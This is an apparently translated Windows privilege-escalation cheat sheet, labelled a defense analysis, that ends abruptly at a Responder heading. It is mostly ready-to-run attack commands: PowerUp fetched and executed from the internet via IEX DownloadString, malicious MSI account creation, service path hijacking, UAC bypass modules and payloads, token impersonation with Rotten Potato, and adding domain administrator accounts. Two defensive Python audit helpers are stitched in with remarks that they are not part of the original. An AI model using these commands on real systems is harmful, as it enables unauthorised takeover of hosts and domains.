Title: Privilege escalation defense analysis

Privilege escalation via kernel overflow vulnerabilities

Manually run commands to find missing patches

systeminfo

wmic qfe get Caption, Description, HotfixID, InstalledOn

Check for specific patch numbers

wmic qfe get Caption,Description,HotfixID,InstalledOn | findstr /C:"KB3143141" /C:"KB976902"

Windows Exploit Suggester

Use the systeminfo command to obtain the patch installation status of the current system and save the output to the file patches.txt.

Update the patch database

python windows-exploit-suggester.py --update

Check for vulnerabilities

python windows-exploit-suggester.py -d 2019-02-02-mssb.xls -i patches.txt

Metasploit built-in local_exploit_suggester module

Sherlock script for PowerShell

https://github.com/rasta-mouse/Sherlock

Import-Module .\Sherlock.ps1

Find-AllVulns

https://github.com/rasta-mouse/Watson

Exploiting Windows misconfigurations

System service permission misconfiguration

PowerUp

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"


Exploitation in Metasploit

The corresponding module is service_permissions.

Registry key AlwaysInstallElevated

AlwaysInstallElevated is a Group Policy setting with which Microsoft allows non-privileged users to run installation packages (MSI files) with SYSTEM privileges. If this policy is enabled, an attacker can use a malicious MSI file to obtain administrator rights. If, after obtaining a Meterpreter session on the target host, SYSTEM privileges cannot be obtained through the usual methods, AlwaysInstallElevated offers another avenue.

Manually check the registry:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both values are 1, the system is at risk.
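A small audit helper for the two reg query commands above, added here as an example that is not part of the original post. It parses the output of each query (the sample output is constructed) and applies the rule that the policy is only effective when both the HKLM and HKCU values are 1; a missing value in either hive means the policy is off.

```python
import re

# Constructed sample output of the two `reg query` commands above; not captured from a real host.
SAMPLE_HKLM_ENABLED = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
SAMPLE_HKCU_ENABLED = SAMPLE_HKLM_ENABLED.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
SAMPLE_HKCU_DISABLED = SAMPLE_HKCU_ENABLED.replace("0x1", "0x0")
# reg query prints only this line when the key or value does not exist.
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value."

VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.MULTILINE)


def parse_always_install_elevated(reg_output: str):
    """Return the DWORD stored in AlwaysInstallElevated, or None when the value is absent."""
    match = VALUE_RE.search(reg_output)
    return int(match.group(1), 16) if match else None


def is_at_risk(hklm_output: str, hkcu_output: str) -> bool:
    """Windows Installer honours the policy only when BOTH hives set it to 1,
    so a value of 0 or a missing value in either hive means the policy is off."""
    return (parse_always_install_elevated(hklm_output) == 1
            and parse_always_install_elevated(hkcu_output) == 1)
```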

PowerUp script

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Get-RegistryAlwaysInstallElevated"

Generate an MSI that adds an account

Write-UserAddMSI

Run it as a normal user

msiexec /q /i UserAdd.msi

The always_install_elevated module in msf can also be used.

Trusted service path vulnerability

Exploitation in Metasploit

Check whether the target machine is vulnerable

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Rename the program to be uploaded, place it in the vulnerable writable directory, and run:

sc stop service_name

sc start service_name

The Windows Service Trusted Path Privilege Escalation module in msf can also be used for testing.

Note: in msf, set AutoRunScript migrate -f so that the session is not lost when the service is restarted.
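A defender-side version of the trusted-path check above, added here as an example that is not part of the original post. It assumes the same wmic query run with /format:csv (the sample output below is constructed), applies the same filter as the findstr chain, and lists for each unquoted auto-start path outside C:\Windows the intermediate file names Windows would try before the real binary; the directories of those names are the ones that must not be writable by normal users.

```python
import re
from typing import List, Tuple

# Constructed sample output of `wmic service get name,pathname,startmode /format:csv`
# (not captured from a real host). wmic's CSV output starts with a blank line and a Node column.
SAMPLE_WMIC_CSV = """
Node,Name,PathName,StartMode
HOST1,Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto
HOST1,BackupAgent,C:\\Program Files\\Example Corp\\Backup Agent\\agent.exe -service,Auto
HOST1,Updater,"C:\\Program Files\\Example Corp\\Updater\\upd.exe" -svc,Auto
HOST1,ManualTool,C:\\Program Files\\Example Corp\\Tool\\tool.exe,Manual
"""


def parse_wmic_csv(text: str) -> List[Tuple[str, str, str]]:
    """Return (name, pathname, startmode) rows; split from both ends so commas inside a path survive."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Node,"):
            continue
        head, startmode = line.rsplit(",", 1)
        _node, name, pathname = head.split(",", 2)
        rows.append((name, pathname.strip(), startmode.strip()))
    return rows


def search_candidates(pathname: str) -> List[str]:
    """File names the service control manager tries, in order, before reaching the real binary
    of an unquoted path: the text before each space, with .exe appended."""
    candidates = []
    for match in re.finditer(r" ", pathname):
        prefix = pathname[:match.start()]
        if not prefix.lower().endswith(".exe"):   # a prefix ending in .exe is the real executable
            candidates.append(prefix + ".exe")
    return candidates


def find_unquoted_service_paths(text: str) -> List[Tuple[str, List[str]]]:
    """Same filter as the findstr chain above: auto-start, unquoted, not under C:\\Windows,
    and containing a space. Each finding carries the paths whose directories must not be writable."""
    findings = []
    for name, pathname, startmode in parse_wmic_csv(text):
        if startmode.lower() != "auto" or pathname.startswith('"'):
            continue
        if pathname.lower().startswith("c:\\windows\\") or " " not in pathname:
            continue
        findings.append((name, search_candidates(pathname)))
    return findings
```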

Unattended installation files

dir /b /s c:\Unattend.xml

dir /b /s c:\sysprep.xml

Check whether these files contain a base64-encoded password.

The msf module for this check is post/windows/gather/enum_unattend.

Scheduled tasks

View scheduled tasks

schtasks /query /fo LIST /v

Find writable scheduled-task folders

accesschk.exe -dqv "C:\Microsoft" -accepteula

List all folders on a drive with weak permissions

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs "Authenticated Users" c:\

List all files on a drive with weak permissions

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs "Authenticated Users" c:\*.*

Empire built-in modules

usemodule privesc/powerup/xxxx

Bypassing UAC to escalate privileges

bypassuac module

Prerequisite: the current user must be a member of the local Administrators group

exploit/windows/local/bypassuac

exploit/windows/local/bypassuac_inject

getsystem

RunAs module

exploit/windows/local/ask

A UAC prompt pops up; once the user clicks through it, a high-privilege shell is returned.

Check privileges with getuid. If it reports a normal user, run getsystem to escalate.

Invoke-PsUACme module in Nishang

Invoke-PsUACme -Verbose ## Use the Sysprep method and run the default payload

Invoke-PsUACme -method oobe -Verbose ## Use the oobe method and run the default payload

Invoke-PsUACme -Payload 'powershell -windowstyle hidden -e YourEncodedPayload' ## Use the -Payload parameter to specify your own payload

bypassuac modules in Empire

bypassuac module

usemodule privesc/bypassuac

execute

bypassuac_wscript module

usemodule privesc/bypassuac_wscript

execute

Token stealing

Token stealing in msf

Assuming a meterpreter shell has already been obtained:

use incognito

list_tokens -u

Call impersonate_token in incognito:

impersonate_token DESKTOP-DUNPKQ9\\Administrator

Note: when entering hostname\username, the backslash must be doubled.

Rotten Potato local privilege escalation

use incognito

list_tokens -u

execute -HC -f rottenpotato.exe

impersonate_token "NT AUTHORITY\\SYSTEM"

Adding a domain administrator

Assuming a process running as a domain administrator exists on the host, migrate into that process from the meterpreter shell and run:

net user test test123!@# /add /domain

net group "domain admins" test /add /domain

Similarly, in the meterpreter shell you can use incognito to impersonate a domain administrator by iterating over all authentication tokens available on the system, and then add the domain administrator.

Run the following command in the active meterpreter shell:

add_user test test!@#123 -h 1.1.1.2

Run the following command to add the account to the Domain Admins group:

add_group_user "Domain Admins" test -h 1.1.1.2

Token stealing analysis in Empire

Run mimikatz, then enter creds

Run:

pth CredID

Obtaining privileges without credentials

LLMNR and NetBIOS spoofing attacks

Responder tool

Turn on listening mode
